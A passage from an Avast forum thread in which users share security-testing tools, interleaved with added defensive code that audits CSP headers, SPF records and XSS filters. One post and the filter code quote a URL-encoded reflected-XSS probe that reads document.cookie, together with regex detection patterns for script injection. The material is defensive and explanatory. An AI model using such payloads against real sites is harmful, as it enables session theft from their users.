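            findings.append(f'unknown directive "{name}" is ignored by browsers')

    # script-src falls back to default-src; if neither exists, anything goes.
    scripts = d.get("script-src", d.get("default-src"))
    if scripts is None:
        findings.append("script-src missing (and no default-src): scripts from anywhere")
    else:
        lower = [s.lower() for s in scripts]
        broad = sorted(s for s in lower if s in BROAD_SOURCES)
        if broad:
            findings.append("script-src allows wildcard-like source(s): " + ", ".join(broad))
        # 'unsafe-inline' is ignored by browsers once a nonce or hash is present.
        strict = any(s.startswith(NONCE_OR_HASH) for s in lower)
        if "'unsafe-inline'" in lower and not strict:
            findings.append("script-src 'unsafe-inline' without nonce/hash: inline XSS not blocked")
        if "'unsafe-eval'" in lower:
            findings.append("script-src 'unsafe-eval': eval()/Function() on attacker strings allowed")

    # object-src also falls back to default-src; only 'none' is safe.
    objects = d.get("object-src", d.get("default-src"))
    if objects is None or [s.lower() for s in objects] != ["'none'"]:
        findings.append("object-src not 'none': plugins that execute JavaScript can be injected")

    if "base-uri" not in d:
        findings.append("base-uri missing: an injected <base> tag redirects relative script URLs")
    # frame-ancestors has NO default-src fallback.
    if "frame-ancestors" not in d:
        findings.append("frame-ancestors missing: CSP does not restrict framing")
    return findings


def framing_verdict(headers: dict) -> dict:
    """Decide whether a response can be framed (clickjacking) from its headers.
    CSP frame-ancestors wins over X-Frame-Options when both are present."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = parse_csp(h.get("content-security-policy", ""))
    if "frame-ancestors" in csp:
        sources = [s.lower() for s in csp["frame-ancestors"]]
        return {"protected": "*" not in sources, "reason": "frame-ancestors " + " ".join(sources)}
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return {"protected": True, "reason": f"X-Frame-Options {xfo}"}
    if xfo.startswith("ALLOW-FROM"):
        return {"protected": False, "reason": "X-Frame-Options ALLOW-FROM is obsolete and ignored"}
    return {"protected": False, "reason": "no frame-ancestors and no X-Frame-Options header"}


# Constructed policies: the wide-open one quoted in the thread, and a strict one.
WIDE_OPEN_CSP = "default-src * 'unsafe-inline' 'unsafe-eval'"
STRICT_CSP = ("default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; "
              "object-src 'none'; base-uri 'none'; frame-ancestors 'none'")

if __name__ == "__main__":
    for label, policy in (("wide open", WIDE_OPEN_CSP), ("strict", STRICT_CSP)):
        print(label, "->", audit_csp(policy) or "all good")
    print(framing_verdict({"Server": "nginx"}))
```

The nonce in STRICT_CSP is a placeholder; a real deployment generates a fresh one per response. Run framing_verdict on the raw header dict of a response rather than on the rendered page, because a meta tag cannot set frame-ancestors or X-Frame-Options.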
Title: Re: Tests and other Media topics
Post by: polonus on October 06, 2016, 12:19:36 AM
While testing some code inside DOM XSS Scanner, I evaluated it with jsunpack and got an error
Results from scanning URL: -https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/FEr7rZpxSFw.js

due to undefined not being valid JSON, so the function is working properly. Info credits: StackOverflow's Djechlin
(This is because JSON does not have a value = NULL).

Kicked up error:
Quote
script
     info: [script] 127.0.0.1/
     info: [decodingLevel=0] found JavaScript
     error: undefined variable JSON
     error: undefined function JSON.stringify
  When you bug-check code, you are bound to find bugs.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on October 06, 2016, 12:50:46 AM
I suggest you get a can of Raid to help solve your bug problem. :)

(http://screencast-o-matic.com/screenshots/u/Lh/1475707830987-77743.png)
Title: Re: Tests and other Media topics
Post by: polonus on October 23, 2016, 12:36:38 PM
Did any part of your home network become part of an IoT botnet?
No, of course not, you may say, because I have the Home Network Protection module of my Avast AV solution enabled!  ;) ;D
So you are more secure than others. OK. Good start. Then now for all the others.

A free scanner here to find out if you are known at Shodan's public IoT scanner:
http://iotscanner.bullguard.com/

You could also check for dorks (often used and abused by these hackers):
https://sourceforge.net/directory/os:windows/?q=google%20dork%20scanner

Do you make use of any of those 62 terribly insecure default passwords?
As always starting with the admin - admin combination or admin - password for that matter?

Read: https://www.malwaretech.com/2016/10/mapping-mirai-a-botnet-case-study.html

Do you have user enumeration settings enabled so they can scan for just such a combination like "polonus - admin" for instance.
I would not dream of using that, but just to give an example it is there....

Also I have seen the rise of this check "have i been pwned": https://haveibeenpwned.com/
Or you may decide not to use it, as your data haven't been shared anywhere before. That is up to you.
You know curiosity killed the poor proverbial animal..... :D

Enjoy, my good avast friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 06, 2016, 02:19:40 PM
Dear avast friends,

I am working on my F-Bufferbloat Status mitigation, and probably it is my chain of routing config that builds this up
or rather problems with my ISP, who had connection problems lately, and sent me an e-mail.
Some have to update their router firmware to get better scores.

Wanna test your Bufferbloat Score here? Go to: https://www.dslreports.com/speedtest (check according to your situation).

Is avast AV interfering to further increase bufferbloat? Some experience high latency problems of several hundred ms.
Bufferbloat testing then comes out disabled. Mine worked the second time around.
Do you have different readings on different browsers or for different devices?

You can also test with this software from Google github, download and open in any browser:
https://google.github.io/latency-benchmark/

An online latency test: http://freeola.com/line-test/#start
Ideally the jitter should always read: 0

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 23, 2016, 04:23:07 PM
Do the privacy DNS test here: https://getdnsapi.net/query.html
My private IP query returned: Response code was: GOOD. Status was: Queries for the name yielded all negative responses

Check yours as well, while the surveillance grabbing may go on in your cloud data,
it is important to know what goes along behind our backs.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2016, 11:11:14 PM
Mirai scam scanners: https://scanme.iotdef.com/
and https://www.incapsula.com/mirai-scanner/

No scareware or are you just not vulnerable?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 26, 2016, 01:30:29 AM
Nice decoding tools to use to protect better on the Big Bad Net: https://paulschou.com/tools/xlate/
so fooling the filters to make the XSS work won't work...

Another online one for connoisseurs: http://encoders-decoders.online-domain-tools.com/

Example
Quote
/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d
%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e
%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
which is being decoded here
as URL output
Quote
/?"><script>docum
ent.cookie</script>
[example 2] [host]/?'><script>documen
t.cookie</script>
Try it here: http://coderstoolbox.net/string/#!encoding=url&action=decode&charset=us_ascii

enjoy, my good friends, enjoy,

polonus
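The decoded example above makes the practical point: a filter that only looks at the raw request string never sees the `<script>` tag, because `%3c%73%63%72%69%70%74%3e` contains no `<`. Here is an added example, not code from the post or from the decoder sites linked above, that canonicalises the input before matching; it goes one step beyond the post's single-round case by also undoing double percent-encoding (`%253C`) and HTML entities (`&lt;`), which defeat a raw-string filter for the same reason. The payload constant is the one quoted in the post; the regex patterns are a constructed, deliberately small filter, not a complete XSS detector.

```python
"""Canonicalise URL-encoded input before matching it against an XSS filter.

Added example; not code from the forum post or from the decoder sites linked
above. Decodes repeatedly so double percent-encoding and HTML entities are
also undone before the filter runs.
"""
import html
import re
from urllib.parse import unquote

# Payload quoted in the post (decodes to /?"><script>document.cookie</script>).
PAYLOAD = ("/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d"
           "%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e")

# Constructed, deliberately small filter: enough to show the decoding problem.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),          # opening script tag
    re.compile(r"javascript\s*:", re.I),      # javascript: URLs
    re.compile(r"\bon[a-z]+\s*=", re.I),      # inline event handlers
]


def naive_filter(value: str) -> bool:
    """What a filter that inspects the raw request string sees."""
    return any(p.search(value) for p in XSS_PATTERNS)


def canonicalize(value: str, max_rounds: int = 5):
    """Percent-decode and entity-decode until the string stops changing.
    Returns (decoded, rounds_needed); rounds > 1 means the input was
    encoded more than once, which is itself suspicious."""
    current = value
    for rounds in range(max_rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            return current, rounds
        current = decoded
    return current, max_rounds


def filter_after_canonicalization(value: str) -> bool:
    """The same filter, applied to the fully decoded string."""
    decoded, _ = canonicalize(value)
    return naive_filter(decoded)


if __name__ == "__main__":
    decoded, rounds = canonicalize(PAYLOAD)
    print("raw filter  :", naive_filter(PAYLOAD))
    print("decoded     :", decoded, f"({rounds} round(s))")
    print("after canon :", filter_after_canonicalization(PAYLOAD))
```

The lesson is the usual one: decode to the form the browser will actually interpret, then filter (better still, encode on output), and treat an input that needed more than one decoding round as an attack indicator in its own right.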
Title: Re: Tests and other Media topics
Post by: polonus on December 01, 2016, 09:07:14 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on December 01, 2016, 09:44:38 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???
Title: Re: Tests and other Media topics
Post by: DavidR on December 01, 2016, 10:35:21 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???

I don't like using these checkers as I'm really trusting NOT. But I gave this a go and it failed to get off the starting blocks. Clicking the Check button fails to do anything.
Title: Re: Tests and other Media topics
Post by: bob3160 on December 01, 2016, 10:40:11 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???

I don't like using these checkers as I'm really trusting NOT. But I gave this a go and it failed to get off the starting blocks. Clicking the Check button fails to do anything.
That means you have something blocking it. I tried it on a throw away and it worked. :)
Title: Re: Tests and other Media topics
Post by: DavidR on December 02, 2016, 12:17:16 AM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???

I don't like using these checkers as I'm really trusting NOT. But I gave this a go and it failed to get off the starting blocks. Clicking the Check button fails to do anything.
That means you have something blocking it. I tried it on a throw away and it worked. :)

I do have firefox tied down pretty well with NoScript, RequestPolicy and ABP add-ons, but I did try to allow areas/sites it accessed, without giving it blanket authority.
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2016, 02:45:50 PM
But the issues still remain: http://www.securityweek.com/gooligan-android-malware-compromises-more-1-million-google-accounts

What is there left we can really, really trust?

With a world so full of unreliable information and outright deceit, I sometimes even worry
whether I can trust the info I spread myself.

I hope I can and always try to be a truthful person in every respect.

Sometimes we are purposefully being fed disinformation or lied to or misled, even brainwashed,
by those that wanna profit from us big time.

What about the ordinary end-user without much technical insight?
You can tell them anything to believe, and they still would be going around in the dark.

You apparently cannot trust all the apps from Google Play,
and Google has a hard time throwing out all those that try to abuse their services.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2016, 11:54:35 PM
Never go against the "same origin policy" or disable it inside the client (CORS disabled).
Only developers on very specific occasions may do so. As a general rule it is mighty unsafe.

See an example of secure frame cross domain communication here: http://sandbox.ternarylabs.com/porthole/
The code resides here: https://ternarylabs.github.io/porthole/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 04, 2016, 06:47:10 PM
Some links here. One for request validation: http://web-sniffer.net/

Then in the struggle against spam mails,
it is important websites have a so-called SPF, aka Sender Policy Framework, record.

The testing tools: http://www.kitterman.com/spf/validate.html

Scan whether they have one: http://www.kitterman.com/getspf2.py
or generate one at http://www.spfwizard.net/  or here: https://www.dynu.com/en-US/NetworkTools/SPFGenerator

Also helpful in the battle against spoofing is the CSR decoder: https://www.sslshopper.com/csr-decoder.html
and see the other tools at that page.

enjoy my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)
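The kitterman.com validator above checks an SPF record's syntax; the points it trips over most are a record that does not start with v=spf1, more than one SPF record on the domain, more than 10 DNS-lookup mechanisms, and a permissive "all". Here is an added example, not code from the post or from the kitterman.com, spfwizard.net or dynu.com tools, that runs those checks offline on TXT records you paste in (for example from `dig TXT example.com`). The TXT records at the bottom are constructed, not looked up from real domains; the limits and qualifier semantics follow RFC 7208.

```python
"""Parse and sanity-check SPF records, offline.

Added example; not code from the forum post or from the kitterman.com / spfwizard
tools linked above. The TXT records below are constructed for illustration;
the checks follow RFC 7208 (v=spf1 prefix, 10-lookup limit, "all" qualifier).
"""
import ipaddress
import re

LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists"}
ALL_MECHANISMS = LOOKUP_MECHANISMS | {"ip4", "ip6", "all"}
MAX_DNS_LOOKUPS = 10  # RFC 7208 section 4.6.4


def parse_spf(record: str) -> list:
    """Return a list of terms: mechanisms (with qualifier) and modifiers."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record (must start with v=spf1)")
    parsed = []
    for term in terms[1:]:
        mod = re.fullmatch(r"([a-zA-Z][a-zA-Z0-9._-]*)=(.*)", term)
        if mod:  # modifiers such as redirect=... or exp=...
            parsed.append({"kind": "modifier", "name": mod.group(1).lower(), "value": mod.group(2)})
            continue
        qualifier = "+"  # an absent qualifier means pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        m = re.fullmatch(r"([a-zA-Z0-9]+)(.*)", term)
        name, arg = (m.group(1).lower(), m.group(2)) if m else (term.lower(), "")
        parsed.append({"kind": "mechanism", "qualifier": qualifier, "name": name, "arg": arg})
    return parsed


def audit_spf(record: str) -> list:
    """Return findings for one SPF record (empty list means it looks sane)."""
    try:
        terms = parse_spf(record)
    except ValueError as exc:
        return [str(exc)]
    findings, lookups, seen_all = [], 0, False
    for t in terms:
        if t["kind"] == "modifier":
            if t["name"] == "redirect":
                lookups += 1  # redirect= costs a lookup like include does
            continue
        name = t["name"]
        if seen_all:
            findings.append(f'"{name}" after "all" is never evaluated')
            continue
        if name not in ALL_MECHANISMS:
            findings.append(f'unknown mechanism "{name}" (receivers return permerror)')
            continue
        if name in LOOKUP_MECHANISMS:
            lookups += 1
        if name == "ptr":
            findings.append("ptr is deprecated (slow, unreliable) and should not be used")
        if name in ("ip4", "ip6"):
            try:
                ipaddress.ip_network(t["arg"].lstrip(":"), strict=False)
            except ValueError:
                findings.append(f'invalid {name} argument "{t["arg"].lstrip(":")}"')
        if name == "all":
            seen_all = True
            if t["qualifier"] == "+":
                findings.append("+all: anyone on the Internet may send as this domain")
            elif t["qualifier"] == "?":
                findings.append("?all: neutral result, gives receivers no signal")
    if lookups > MAX_DNS_LOOKUPS:
        findings.append(f"{lookups} DNS lookups exceed the limit of {MAX_DNS_LOOKUPS} (permerror)")
    has_redirect = any(t["kind"] == "modifier" and t["name"] == "redirect" for t in terms)
    if not seen_all and not has_redirect:
        findings.append('no "all" mechanism: unlisted senders get a neutral result')
    return findings


def audit_txt_records(txt_records) -> list:
    """Audit the TXT RRset of a domain: exactly one SPF record is allowed."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return ["no SPF record published: receivers cannot reject spoofed mail"]
    if len(spf) > 1:
        return [f"{len(spf)} SPF records published: receivers return permerror"]
    return audit_spf(spf[0])


# Constructed TXT records (not looked up from real domains).
GOOD_TXT = ["v=spf1 include:_spf.example.net ip4:203.0.113.0/24 -all",
            "google-site-verification=abc123"]
BAD_TXT = ["v=spf1 ptr ip4:999.1.1.1 +all include:late.example.org"]

if __name__ == "__main__":
    print("good:", audit_txt_records(GOOD_TXT) or "OK")
    print("bad :", audit_txt_records(BAD_TXT))
```

The lookup count here is the record's own; a full check follows every include: and redirect= recursively and adds their lookups too, which is why a record with only three includes can still exceed the limit in practice.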
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2016, 12:55:21 AM
Real method to come to a free second-op scan or too good to be true?

Read: http://www.infoworld.com/article/3014323/security/a-free-almost-foolproof-way-to-check-for-malware.html#tk.ifw-infsb

Anyone to react?

polonus

P.S. I can imagine a couple of situations where this won't work, as for instance with malware like visbot that lies dormant until the moment you start to perform certain specific actions in the browser. In such and other plausible situations it is better to have a real AV like avast, folks.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on December 06, 2016, 01:43:09 PM
Nice read for those into javascript malware analysis.

Where a bit of code, hidden as Latin terms, could produce a very dangerous piece of javascript malware: http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis/
 (go down to where it reads "Holy Crap, This Thing Is Bad (Or, "Latin Lingo")" and then read on). Link article author: Schill.

A more general introduction: https://heimdalsecurity.com/blog/javascript-malware-explained/  (Andra Zaharia).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2016, 01:30:15 PM
You find the following three privacy settings listed under the main settings tab in the uBlock Origin options (which you access with a right-click on the icon and selecting Options). Go to the uBlock0 Dashboard.

Disable pre-fetching (to prevent any connection for blocked network requests).
Disable hyperlink auditing/beacon.
Prevent WebRTC from leaking local IP addresses (this setting is not enabled by default).
The new setting provides you with a toggle to enable or disable WebRTC from leaking your local IP address.

Test here: https://diafygi.github.io/webrtc-ips/   STUN Servers won't log you anymore.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2016, 01:51:42 PM
A stun server list: https://gist.github.com/zziuni/3741933
see: https://sourceforge.net/projects/stun/

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on December 12, 2016, 02:12:05 PM
(http://screencast-o-matic.com/screenshots/u/Lh/1481548183891-69930.png)
https://www.reverse.it/
Another tool that might come in handy. :)
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2016, 02:16:32 PM
Hi bob3160,

Thanks for the link.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on December 12, 2016, 02:30:03 PM
Hi bob3160,

Thanks for the link.

polonus
You're welcome. Let me know if you get anything out of this one that you don't already get from your arsenal. :)
Title: Re: Tests and other Media topics
Post by: Pondus on December 12, 2016, 03:04:11 PM
Bob / Polonus it is the same as this > https://www.hybrid-analysis.com/

https://www.payload-security.com/

Title: Re: Tests and other Media topics
Post by: Para-Noid on December 12, 2016, 05:48:18 PM
Bob / Polonus it is the same as this > https://www.hybrid-analysis.com/

https://www.payload-security.com/

I'm neither Bob nor polonus, but as far as I can tell...yes.
Title: Re: Tests and other Media topics
Post by: Para-Noid on December 12, 2016, 05:57:36 PM
https://www.leakedsource.com/main/notify/

Found this recently and thought it worthy to share. If your web account (Google, Yahoo, MSN, etc) has been compromised you will get an email notification.
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2016, 06:00:13 PM
Thanks to Para-Noid for answering Pondus,

and now to something completely different, your browser leaking....

Testing for browser leaks to STUN Servers - WebRTC or via WebGL, here are best sites to test:
https://vpnreviewer.com/best-sites-check-ip-leaks-2016

enjoy,

polonus

P.S. @ Para-Noid,
        If you fill that address out there, is not at the same time these info being harvested for ?????????.
       Something deep inside says me, that they do not run these services just because they have blue eyes
        or they are benefactors.... ;D
Title: Re: Tests and other Media topics
Post by: Para-Noid on December 12, 2016, 06:43:23 PM

P.S. @ Para-Noid,
        If you fill that address out there, isn't that info being harvested at the same time for ?????????.
        Something deep inside tells me that they do not run these services just because they have blue eyes
        or because they are benefactors.... ;D

I seriously doubt it. LeakedSource is well known for investigating data breaches.
I found the link while reading http://www.zdnet.com/article/dailymotion-hack-exposes-millions-of-accounts/

https://www.leakedsource.com/api/   https://www.leakedsource.com/api/documentation/
https://www.leakedsource.com/main/databaselist/   https://www.leakedsource.com/blog/
Title: Re: Tests and other Media topics
Post by: digmor crusher on December 12, 2016, 08:38:12 PM
Thanks to Para-Noid for answering Pondus,

and now to something completely different, your browser leaking....

Testing for browser leaks to STUN Servers - WebRTC or via WebGL, here are best sites to test:
https://vpnreviewer.com/best-sites-check-ip-leaks-2016

enjoy,

polonus

P.S. @ Para-Noid,
        If you fill that address out there, isn't that info being harvested at the same time for ?????????.
        Something deep inside tells me that they do not run these services just because they have blue eyes
        or because they are benefactors.... ;D


After reading this I tried a Chrome extension called WebRTC Leak Prevent, it worked to stop any RTC leaks in Chrome according to the doileak.com website.
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2016, 10:03:23 PM
Why not have the pair WebRTC Leak Prevent and Disable WebGL.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2016, 11:04:43 PM
Google is developing software to test crypto:
https://github.com/google/wycheproof

For websites I always look at: https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp
For DROWn I look at one of these results: https://observatory.mozilla.org/
as this scan that once was here won't function: https://drownattack.com/ (taken off apparently).
so use this one: https://pentest-tools.com/network-vulnerability-scanning/drown-ssl-scanner

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on December 22, 2016, 04:55:33 PM
Google is developing software to test crypto:
https://github.com/google/wycheproof (https://github.com/google/wycheproof)

For websites I always look at: https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp (https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp)
For DROWn I look at one of these results: https://observatory.mozilla.org/ (https://observatory.mozilla.org/)
as this scan that once was here won't function: https://drownattack.com/ (https://drownattack.com/) (taken off apparently).
so use this one: https://pentest-tools.com/network-vulnerability-scanning/drown-ssl-scanner (https://pentest-tools.com/network-vulnerability-scanning/drown-ssl-scanner)

polonus
https://forum.avast.com/index.php?topic=19387.msg1355691#msg1355691
Title: Re: Tests and other Media topics
Post by: polonus on December 22, 2016, 05:45:55 PM
Thanks, bob3160, for reacting.

Have a Great Christmas ye all and stay cyber-secure!
-> https://www.youtube.com/watch?v=LNvejfhF958

Damian
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2016, 12:32:10 AM
When you run your own flavour of DHCP daemon on your Windows home network, you certainly wanna know it is no sniff,
so test it here: http://files.thecybershadow.net/dhcptest/  (allowed for private and personal networks only).
Re: https://github.com/CyberShadow/dhcptest
I used Vladimir Panteleev's Windows version: http://blog.thecybershadow.net/2013/01/10/dhcp-test-client/
v0.5 with a Win64 build: http://files.thecybershadow.net/dhcptest/dhcptest-0.5-win64.exe

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2017, 01:55:47 AM
Firefox will get protection against font fingerprinting.

When you do not have Java and Silverlight plug-ins installed, you should not be too overly afraid of being uniquely followed
via font fingerprinting.

Users of Linux could use fluxfonts: https://github.com/da2x/fluxfonts

Font fingerprinting seems obsolete, read: https://browserleaks.com/fonts
When testing I get all question marks for my browser

JS Fonts (unicode)
Fingerprint   ?
Report   ?
JS Fonts (classic)
Fingerprint   ?
Report   ?
Flash Fonts
Fingerprint   ?
Report   ?

Canvas fingerprinting I blocked via a specific extension for that.

But there are some other issues to worry about: https://amiunique.org/faq

Do not use a browser when you do not want to be traced. To-day the formula is as simple as that.

Privacy = no Internet....period.

Do you not believe us, test it out here: https://amiunique.org/fp

Another issue to get worried about in 2017 when you live inside the EU.
Read it while I am probably still allowed to use a link: https://juliareda.eu/2016/12/10-illegal-things/
Just ponder the implications of this, not for big corporations but just for you and me,
the average user of the Interwebs.  (see attached image)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2017, 03:55:54 PM
NoScript alerts for javascript in Tor Browser, and why third-party tracking blocking makes browsing faster.

Here we have an alert caused by script from this tag link's javascript: -http://tags.bkrtx.com/js/bk-coretag.js
helped here: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fd1z2jf7jlzjs58.cloudfront.net%2Fp.js
for this vid link: -http://www.infoworld.com/article/2612716/hacking/video--how-to-hack-php-sites-with-sql-injection.html
opened with Tor Browser.

Consider the SRI report: https://sritest.io/#report/5f5cd7c1-40fb-4fe3-be12-735ab291c089
Insecure tracking from:
-www.googletagmanager.com
-p.typekit.net
- comScore
-jsonip.com
-shaaaaaaaaaaaaa.com
-www.infoworld.com
-fonts.staticworld.net
-a.postrelease.com
- t.zqtk.net
-i-dge.staticworld.net
-core0.staticworld.net
-tags.bkrtx.com BlueKai
- core3.staticworld.net
-trends.revcontent.com
- Parse.ly
- ak.sail-horizon.com
- pixel.staticworld.net

See: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fd1z2jf7jlzjs58.cloudfront.net%2Fp.js
and producing errors here: http://www.domxssscanner.com/scan?url=http%3A%2F%2Ftags.bkrtx.com%2Fjs%2Fbk-coretag.js  hosted via -a104-95-76-57.deploy.static.akamaitechnologies.com

This is due to BlueKai tracking, which produced an issue with ABP as it was very hard to block for ad-blockers.

These scripts come best blocked by  https://github.com/mozilla/blok
tor development should give this software a look....

The results of the tracking report:
url   scheme   host   path   type   query   aid   cid   date   patterns   objects   name   affiliation
-http://tags.bkrtx.com/js/bk-coretag.js   -http   tags.bkrtx.com   /js/bk-coretag.js   tracker      116   31   2017-01-10 15:47:48   (stags|tags)\.bluekai\.com   -http://tags.bluekai.com   BlueKai   
-http://tags.bkrtx.com/js/bk-coretag.js   -http   tags.bkrtx.com   /js/bk-coretag.js   tracker      116   31   2017-01-10 15:47:48   bkrtx\.com\/js\/   -http://tags.bkrtx.com/js/bk-coretag.js   BlueKai   
-http://tags.bkrtx.com/js/bk-coretag.js   -http   tags.bkrtx.com   /js/bk-coretag.js   tracker      116   31   2017-01-10 15:47:48   bluekai\.com   -http://tags.bluekai.com   BlueKai   

Trackers reach over 21 million pages on 350,000 unique sites, so if you turn up the security slider in Tor Browser to block this code that you'd block anyway, your browsing gets faster and you won't miss anything.
Such tracking code could also lead to unwanted pop-ups and browser hijacker objects you'd rather like to be without.

For background reading: http://www2016.net/proceedings/proceedings/p121.pdf  (source: cliqz)

And where tracking protection created problems for firefox, especially with facebook tracking (yes facebook is a mass media tracking device) : https://bugzilla.mozilla.org/showdependencytree.cgi?id=1101005&hide_resolved=1

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2017, 06:54:02 PM
But be aware, my good friends, insecurity lures everywhere and could be around every corner: http://retire.insecurity.today/#!/scan/e5f3453ae57ebde51a9a0be770075324c12ec4c4820a87f55f8a1207da9c529d
and universal XSS threat for https://www.htbridge.com/websec/?id=c0eb5653d7c5b0277ef5a899beee70c79186df4e90c91de738ac9ca4e77e11e2
Not safe internal CRM website -https://gillii.torproject.org/  ( imagine with authstealer.js?).
Re: http://toolbar.netcraft.com/site_report?url=https://gillii.torproject.org

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2017, 02:55:07 PM
Did you check your Content Security Policy at https://csp-evaluator.withgoogle.com/ ?
Even the most secure sites may have some weaknesses.
Let us look at the settings for https://observatory.mozilla.org/
Like here:
Quote
default-src 'none';
connect-src https://api.ssllabs.com https://hstspreload.org https://http-observatory.security.mozilla.org https://securityheaders.io https://tls.imirhil.fr https://tls-observatory.services.mozilla.com https://www.htbridge.com;
font-src 'self' https://fonts.gstatic.com;
frame-ancestors 'none';
img-src 'self';
script-src 'self';
style-src 'self' https://fonts.googleapis.com
Quote
content-security-policy

default-src 'none'; connect-src https://api.ssllabs.com https://hstspreload.org https://http-observatory.security.mozilla.org https://securityheaders.io https://tls.imirhil.fr https://tls-observatory.services.mozilla.com https://www.htbridge.com; font-src 'self' https://fonts.gstatic.com; frame-ancestors 'none'; img-src 'self'; script-src 'self'; style-src 'self' https://fonts.googleapis.com, upgrade-insecure-requests; block-all-mixed-content

Possible medium security issue:
Quote
img-src (check)
script-src 'self' (help): 'self' can be problematic if you host JSONP, Angular or user uploaded files.
style-src (check)

HTTP security headers (Name / Value / Setting secure): content-security-policy

Cache-control header not returned.
Page meta security headers not set securely. Form autocomplete settings: scantron-form HTML form not secure.

polonus (volunteer website security analyst and website error-hunter)
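As an added example (not code from csp-evaluator, observatory.mozilla.org or this thread), here is a small checker that parses the CSP header quoted above and reports the kind of findings the evaluator shows, including the 'self' in script-src point; a second, constructed header is a deliberately weak policy for contrast. It assumes the CSP rules that a comma separates independent policies, that script-src and object-src fall back to default-src while frame-ancestors and base-uri do not, and that a source is only effectively allowed when every governing policy allows it.

```javascript
// Added example: a small CSP checker, not code from csp-evaluator or Observatory.
// Rules assumed from the CSP spec: a comma separates independent policies, within a
// policy the first occurrence of a directive wins, script-src/object-src fall back
// to default-src while frame-ancestors/base-uri do not, and a source is only
// effectively allowed when every policy that governs the directive allows it.

// Header exactly as quoted in the post above (from observatory.mozilla.org).
const OBSERVATORY_CSP =
  "default-src 'none'; connect-src https://api.ssllabs.com https://hstspreload.org " +
  "https://http-observatory.security.mozilla.org https://securityheaders.io " +
  "https://tls.imirhil.fr https://tls-observatory.services.mozilla.com " +
  "https://www.htbridge.com; font-src 'self' https://fonts.gstatic.com; " +
  "frame-ancestors 'none'; img-src 'self'; script-src 'self'; " +
  "style-src 'self' https://fonts.googleapis.com, upgrade-insecure-requests; " +
  "block-all-mixed-content";

// Constructed weak policy for contrast (not taken from any real site).
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:; script-src 'none'";

function parseCsp(header) {
  return header.split(',').map((policy) => {
    const directives = new Map();
    for (const raw of policy.split(';')) {
      const tokens = raw.trim().split(/\s+/).filter(Boolean);
      if (tokens.length === 0) continue;
      const name = tokens[0].toLowerCase();
      if (!directives.has(name)) directives.set(name, tokens.slice(1)); // duplicates ignored
    }
    return directives;
  });
}

// Source lists that govern a directive across all policies; empty = unrestricted.
function governingLists(policies, name, fallsBackToDefault) {
  const lists = [];
  for (const p of policies) {
    const list = p.get(name) || (fallsBackToDefault ? p.get('default-src') : undefined);
    if (list) lists.push(list);
  }
  return lists;
}

// A source is effectively allowed only when every governing list allows it.
function everyListHas(lists, pred) {
  return lists.length > 0 && lists.every((list) => list.some(pred));
}

function evaluateCsp(header) {
  const policies = parseCsp(header);
  const findings = [];
  const add = (severity, directive, message) => findings.push({ severity, directive, message });

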